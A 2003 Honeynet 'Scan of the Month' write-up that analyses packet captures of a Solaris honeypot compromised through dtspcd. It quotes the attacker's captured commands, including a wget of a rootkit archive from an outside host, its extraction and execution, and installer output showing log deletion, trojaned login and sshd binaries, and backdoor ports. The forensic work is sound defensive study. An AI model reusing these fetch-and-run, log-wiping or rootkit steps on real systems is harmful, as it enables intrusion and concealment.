| Honeynet Scan of the Month 28 | |
| Submitter: | Matthijs R. Koot (koot at cyberwar.nl) |
| Date: | May 13, 2003 |
| URL: | http://www.honeynet.org/scans/scan28/ |
| Rcpt: | sotm at honeynet.org |
Members of the AT&T Mexico Honeynet captured a unique attack. As common, what is interesting is not how the attackers broke in, but what they did afterwards. Your mission is to analyze the network capture of the attacker's activity and decode the attacker's actions. There are two binary log files. Day1 captured the break in, Day3 captures some unique activity following the compromise. The honeypot in question is IP 192.168.100.28. Make sure you review the challenge criteria before submitting your writeup.
day1.log.gz
MD5 (day1.log.gz) = 79e5871791542c8f38dd9cee2b2bc317
day3.log.gz MD5 (day3.log.gz)
= af8ab95f41530fe3561b506b422ed636
First, I downloaded both files:
$wget http://www.honeynet.org/scans/scan28/day1.log.gz $wget http://www.honeynet.org/scans/scan28/day3.log.gz
Secondly, I verified the MD5 checksums (on FreeBSD md5 is used to verify the checksums, on Linux you'd have to use md5sum):
$md5 day1.log.gz
MD5 (day1.log.gz) = 8d5ea7e8dadfc1c990b7901b2cbffb41
$md5 day3.log.gz
MD5 (day3.log.gz) = af8ab95f41530fe3561b506b422ed636
...I unpacked the gzipped logs:
$gunzip day1.log.gz day3.log.gz
...I opened both binary logs in Ethereal to start analyzing the traffic.
The honeynet responded to "uname -a" with the following output, which means it ran SunOS 5.8 SPARC:
SunOS zoberius 5.8 Generic_108528-09 sun4u sparc SUNW,Ultra-5_10
I got this result by coincidence while manually investigating the logged traffic in Ethereal.
He exploited 6112/TCP (dtspcd), abusing ingrelock for an interactive shell to download several tools and a rootkit.
62.219.90.180 - the attacker
62.211.66.16 - XOOM FTP used by the attacker to storing exploits
62.211.66.53 - XOOM webserver used by the attacker to store a rootkit
(192.168.100.28 - the compromised honeynet)
HOW the systems where used - see #4.
I don't have any software available at this time to create a diagram, so I'm settling for a chronological approach.
At 17:36:25, remote host 62.219.90.180 queries 6112/TCP (dtspcd).
At 17:36:26, the host sent a payload in a successful attempt to exploit
it.
Result of payload, put together
#uname -a; SunOS zoberius 5.8 Generic_108528-09 sun4u sparc SUNW,Ultra-5_10.
#ls -l /core /var/dt/tmp/DTSPCD.log;
/core: No such file or directory.
/var/dt/tmp/DTSPCD.log: No such file or directory.
#PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/ccs/bin:/usr/gnu/bin;
#export PATH;
#echo "BD PID(s): "`ps -fed|grep ' -s /tmp/x'|grep -v grep|awk '{print $2}'`.
BD PID(s): 1773.
At 17:42:42, the attacker uses the exploited ingresblock to fire up a FTP session to 62.211.66.16, which is a server of the free hosting provider XOOM:
220 services FTP server (Version XOOM FTP 1.24.3+local-release Fri Aug 28 15:52:40 PDT 1998) ready.
The attacker logs in using username "bobzz" and password "joka". He successfully downloads some files to the compromised honeynet server:
At 17:45:13, about 2-3 minutes later, the attacker disconnects the honeynet from the FTP server.
#chmod +x solbnc wget dlp #./wget wget: missing URL Usage: wget [OPTION]... [URL]... Try `wget --help' for more options. #./wget http://62.211.66.53/bobzz/sol.tar.gz
At 17:52:40, about 7 seconds after the first attempt to download the rootkit, a second attempt is made.
#rrrrrretar -xf sol.tar.gz. rrrrrretar: not found #cd sol
sol: does not exist
#./setup
./setup: not found #cd sol
sol: does not exist
#tar -xf sol.tar.gz
#cd sol
#./setup
[0;36mbobz oN ircNet on join #priv.
/\ /\ _/ \ ___| Autor: bobz |___ / \_ \ / \ / \/ \/ ******** ******** ** ** ** ** ** ** * * ******* ********** ** ** * * ******* ** ** ****** ******** ** ** ** ****** ********** ******* ** ** ** ** ** ** ******* ** ** ** ** ** ** ********** ** ** ** ** /\ /\ _/ \ ___| Autor: bobz |___ / \_ \ / \ / \/ \/ ...:::[ Autore bobz ]:::... ...:::[ On IRcnEt On Join #bobz ]:::... Ti:AmO:RosariADelete Logz ------- Deleting /var/log... /var/log/secure: No such file or directory /var/log/secure.1: No such file or directory /var/log/secure.2: No such file or directory /var/log/secure.3: No such file or directory /var/log/secure.4: No such file or directory /var/log/boot.log: No such file or directory /var/log/boot.log.1: No such file or directory /var/log/boot.log.2: No such file or directory /var/log/boot.log.3: No such file or directory /var/log/boot.log.4: No such file or directory /var/log/cron: No such file or directory
/var/log/cron.1: No such file or directory /var/log/cron.2: No such file or directory /var/log/cron.3: No such file or directory /var/log/cron.4: No such file or directory /var/log/lastlog: No such file or directory /var/log/xferlog: No such file or directory /var/log/xferlog.1: No such file or directory /var/log/xferlog.2: No such file or directory /var/log/xferlog.3: No such file or directory /var/log/xferlog.4: No such file or directory /var/log/wtmp: No such file or directory /var/log/wtmp.1: No such file or directory /var/log/spooler: No such file or directory /var/log/spooler.1: No such file or directory /var/log/spooler.2: No such file or directory /var/log/spooler.3: No such file or directory /var/log/spooler.4: No such file or directory --- LogZ Cancellati... Delete LogZ by warning [1;37m*[0;37m Starting up at: [0;36m1038585350[0;37m
[1;37m*[0;37m Installing from /usr/share/man/man1/.old/sol - Will erase /usr/share/man/man1/.old/sol after install [1;37m*[0;37m Checking for existing rootkits... [1;37m*.[0;37m Checking for existing rootkits... [1;37m*.[0;37m checking /etc/rc2 and /etc/rc3 for rootkits... [1;37m*.[0;37m Rootkits Removed from config files
[1;37m*.[0;37m checking crond configs for rootkits... [1;37m*.[0;37m Rootkits Removed from crond config files
[1;31m*** WARNING ***
[0;37m 2 suspicious files found in /dev
[1;37m***[0;37m Insert Rootkit Password : mixer [1;37m***[0;37m Using Password mixer
[1;37m***[0;37m Insert Rootkit SSH Port :
5001
[1;37m***[0;37m Using Port 5001
[1;37m***[0;37m Insert Rootkit PsyBNC Port : 7000
[1;37m***[0;37m Using Port 7000
File processed...
[1;37m*[0;37m Making backups... su ping du passwd find ls netstat strings ps Done. [1;37m*[0;37m Installing trojans... login sshd netstat ls find strings du passwd ping su Complete.
[1;37m*[0;37m Suid removal at atq atrm eject fdformat rdist rdist admintool ufsdump ufsrestore quota ff
core lpset lpstat netpr arp chkperm Complete.
[1;37m*[0;37m Starting Patcher....* Patching.... DTSCD PATCHED. LPD PATCHED. fingerd.
<28>Nov 29 09:56:18 inetd[167]: [ID 858011 daemon.warning] /usr/dt/bin/rpc.cmsd: Killed
cmsd.
<28>Nov 29 09:56:18 inetd[167]: [ID 858011 daemon.warning] /usr/sbin/sadmind: Killed
ttdbserverd. sadmind. statd. rquotad. rusersd. cachefsd.
<27>Nov 29 09:56:19 inetd[1773]: [ID 801587 daemon.error] /tmp/x: No such file or directory
bindshells. snmpXdmid. Done...
Now the attacker has suited, he downloads two patches for the system to make sure nobody can hijack the comprimised system away from him:
ftp://sunsolve.sun.com:21/pub/patches/111085-02.zip
ftp://sunsolve.sun.com:21/pub/patches/108949-07.zip
He patches the system and installs solbnc, a psyBNC (solbnc stands for SOLaris BNC, which basically is an IRC proxy used to keep anonymous).
On day 3, the attacker applied another patch:
ftp://sunsolve.sun.com:21/pub/patches/111085-02.zip
My best gues is they're part of a DDoS setup, Stacheldraht is known to use "skillz" and "ficken" in the ICMP data field. However, a property of Stacheldraht is that it uses special, hardcoded IDs like 666. This is not the case in this SotM. If indeed DDoS is involved, it may be a Stacheldraht derival.
The honeynet does not receive any pings, it only sends ping replies; the compromised system therefore might act as an agent, beakoning to home (nocfftl.etel.hu and 61.134.3.11).
At 01:11:10 on day 3 the attacker enabled IPv6. This may be seen as rather unusual, although IPv6 can coexists with IPv4 in the same network. Several ICMPv6 packets sent which all had the Type field set to 131 (Group Membership Report). In addition, TCP communication had place over IPv6 to 163.162.170.173, port 6667/TCP and port 113/TCP, which looks like even more IRC. It was used to connect to an IRC server of a large Italian ISP, irc6.edisontel.it.
USER ahaa ahaa 127.0.0.1 :-:OwnZ:- NICK `OwnZ`` :irc6.edisontel.it 001 `OwnZ`` :Welcome to the Internet Relay Network `OwnZ``!~ahaa@bacardi.orange.org.ru :irc6.edisontel.it 002 `OwnZ`` :Your host is irc6.edisontel.it, running version 2.10.3p3+hemp :irc6.edisontel.it 003 `OwnZ`` :This server was created Thu Jul 4 2002 at 20:02:20 CEST :irc6.edisontel.it 004 `OwnZ`` irc6.edisontel.it 2.10.3p3+hemp aoOirw abeiIklmnoOpqrstv Line 5 : :irc6.edisontel.it 005 `OwnZ`` MAP PREFIX=(ov)@+ MODES=3 CHANTYPES=#&!+MAXCHANNELS=20 NICKLEN=9 TOPICLEN=160 KICKLEN=160 NETWORK=IRCNet CHANMODES=beI,k,l,imnpsaqr :are supported by this server Line 6 : :irc6.edisontel.it 251 `OwnZ`` :There are 104308 users and 6 services on 46 servers Line 7 : :irc6.edisontel.it 252 `OwnZ`` 180 :operators online Line 8 : :irc6.edisontel.it 253 `OwnZ`` 3 :unknown connections Line 9 : :irc6.edisontel.it 254 `OwnZ`` 51164 :channels formed Line 10 : :irc6.edisontel.it 255 `OwnZ`` :I have 739 users, 0 services and 1 servers Line 11 : :irc6.edisontel.it 265 `OwnZ`` :Current local users: 739 Max: 1163 Line 12 : :irc6.edisontel.it 266 `OwnZ`` :Current global users: 104308 Max: 125806 MODE `OwnZ`` +i :irc6.edisontel.it 001 `OwnZ`` :Welcome to the Internet Relay Network `OwnZ``!~ahaa@host222-14.pool80117.interbusiness.it :irc6.edisontel.it 375 `OwnZ`` :- irc6.edisontel.it Message of the Day - Line 2 : :irc6.edisontel.it 372 `OwnZ`` :- 6/8/2002 17:20 Line 3 : :irc6.edisontel.it 372 `OwnZ`` :- Line 4 : :irc6.edisontel.it 372 `OwnZ`` :- Welcome on... Line 5 : :irc6.edisontel.it 372 `OwnZ`` :- Line 6 : :irc6.edisontel.it 372 `OwnZ`` :- _ __ _____ _ _ _____ _ _ _ Line 7 : :irc6.edisontel.it 372 `OwnZ`` :- (_)_ __ ___ / /_ | ____|__| (_)___ ___ _ _|_ _|__| | (_) |_ Line 8 : :irc6.edisontel.it 372 `OwnZ`` :- | | '__/ __| '_ \ | _| / _ | / __|/ _ \| '_ \| |/ _ \ | | | __| Line 9 : :irc6.edisontel.it 372 `OwnZ`` :- | | | | (__| (_) || |__| (_| | \__ \ (_) | | | | | __/ |_| | |_ Line 10 : :irc6.edisontel.it 372 `OwnZ`` :- |_|_| \___|\___(_)_____\__,_|_|___/\___/|_| |_|_|\___|_(_)_|\__| Line 11 : :irc6.edisontel.it 372 `OwnZ`` :- Line 12 : :irc6.edisontel.it 372 `OwnZ`` :- - IPv6 I-lines are only for italian pTLA. Line 13 : :irc6.edisontel.it 372 `OwnZ`` :- We do not discuss I-lines for pTLA other than *.it Line 14 : :irc6.edisontel.it 372 `OwnZ`` :- Line 15 : :irc6.edisontel.it 372 `OwnZ`` :- - Port 6665 to 6669 are listening for clients. Line 16 : :irc6.edisontel.it 372 `OwnZ`` :- Line 17 : :irc6.edisontel.it 372 `OwnZ`` :- - IRC is mean for peaceful communication in respect Line 18 : :irc6.edisontel.it 372 `OwnZ`` : SETAWAY -OwnZ- :irc6.edisontel.it 002 `OwnZ`` :Your host is irc6.edisontel.it, running version 2.10.3p3+hemp :irc6.edisontel.it 003 `OwnZ`` :This server was created Thu Jul 4 2002 at 20:02:20 CEST :irc6.edisontel.it 004 `OwnZ`` irc6.edisontel.it 2.10.3p3+hemp aoOirw abeiIklmnoOpqrstv :irc6.edisontel.it 005 `OwnZ`` MAP PREFIX=(ov)@+ MODES=3 CHANTYPES=#&!+ MAXCHANNELS=20 NICKLEN=9 TOPICLEN=160 KICKLEN=160 NETWORK=IRCNet CHANMODES=beI,k,l,imnpsaqr :are supported by this server :irc6.edisontel.it 251 `OwnZ`` :There are 104308 users and 6 services on 46 servers :irc6.edisontel.it 252 `OwnZ`` 180 :operators online :irc6.edisontel.it 253 `OwnZ`` 3 :unknown connections :irc6.edisontel.it 254 `OwnZ`` 51164 :channels formed :irc6.edisontel.it 255 `OwnZ`` :I have 739 users, 0 services and 1 servers :irc6.edisontel.it 265 `OwnZ`` :Current local users: 739 Max: 1163 :irc6.edisontel.it 266 `OwnZ`` :Current global users: 104308 Max: 125806 :-psyBNC!psyBNC@lam3rz.de PRIVMSG `OwnZ`` :AWAY changed to '-OwnZ-'... - and understanding of the other people and cultures... Line 2 : :irc6.edisontel.it 372 `OwnZ`` :- Please remember that all the time and have fun. Line 3 : :irc6.edisontel.it 372 `OwnZ`` :- Line 4 : :irc6.edisontel.it 372 (...)
I think I was able to figure it out from the day1 packetdump. The exploit code ("ipv6sun") looks rather Italian: Inserisci il tuo ipv4. The attacker - who calls himself "bob", "bobz" or "bobbino" - was connected through an Italian ISP while attack the honeypot. On day 3, the attacker connects to an IRC server of an Italian ISP to perform some DDoS related tasks and to chat, in Italian, with (among others) someone named "_-PaKi-_" and someone named "RiValD|n0". From all this I would say it is likely that the attacker is from Italian origin.
I'm a little short of time and this write-up isn't as thorough and detailled as it is rightfully supposed to be. However, these challenges are just too much fun :-)
I'll hope to do a better write-up in SotM29!
SotM28, Matthijs Koot